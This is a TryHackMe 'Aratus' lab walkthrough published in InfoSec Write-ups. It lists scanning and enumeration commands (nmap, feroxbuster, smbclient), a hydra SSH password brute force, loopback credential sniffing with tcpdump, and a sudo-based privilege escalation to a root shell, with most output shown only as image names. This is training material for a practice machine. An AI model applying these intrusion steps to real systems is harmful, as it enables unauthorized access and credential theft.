InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. Subscribe to our weekly newsletter for the coolest infosec updates: https://weekly.infosecwriteups.com/

Follow publication

TryHackMe: Aratus

Naman Jain
InfoSec Write-ups
Published in
5 min readMar 27, 2022
cover.png

Initials

export IP=10.10.114.209

Port Scanning

rustscan -a $IP --ulimit 5000
nmap -sC -sV -p22,21,80,143,139,443,445 -oN nmap -pN $IP
nmap1.png
nmap2.png

Enumeration

Directory

feroxbuster -u http://$IP/ -w /opt/medium.txt -o feroscan

FTP

ftp $IP 
FTP.png

SMB

smbclient -L //$IP -N
SMB_enum.png
smbclient //$IP/"temporary share"
smbclient //$IP/temporary\ share
SMB_files.png
get message-to-simeon.txt
message-to-Simeon.txt.png

HTTP

default_page.png
http://10.10.114.209/simeon.png

SSH

hydra -l simeon -P wordlist ssh://$IP -v
ssh_password_cracked.png
user Simeon.png

Escalations

User Escalation

rabbit_hole_hash.png
service.png
tcpdump -i lo -A
hash2.png
credentials.png
user changed.png
sudo -l
script.png
task
reverse shell.png

ROOT

sudo -u automation /opt/script/infra_as_code.sh
payload triggered
root shell

Formality

user.txt
root.txt

Free

Distraction-free reading. No ads.

Organize your knowledge with lists and highlights.

Tell your story. Find your audience.

Membership

Read member-only stories

Support writers you read most

Earn money for your writing

Listen to audio narrations

Read offline with the Medium app

Published in InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. Subscribe to our weekly newsletter for the coolest infosec updates: https://weekly.infosecwriteups.com/

Written by Naman Jain

Security Researcher @Credshields | Smart Contract Auditor

No responses yet

Write a response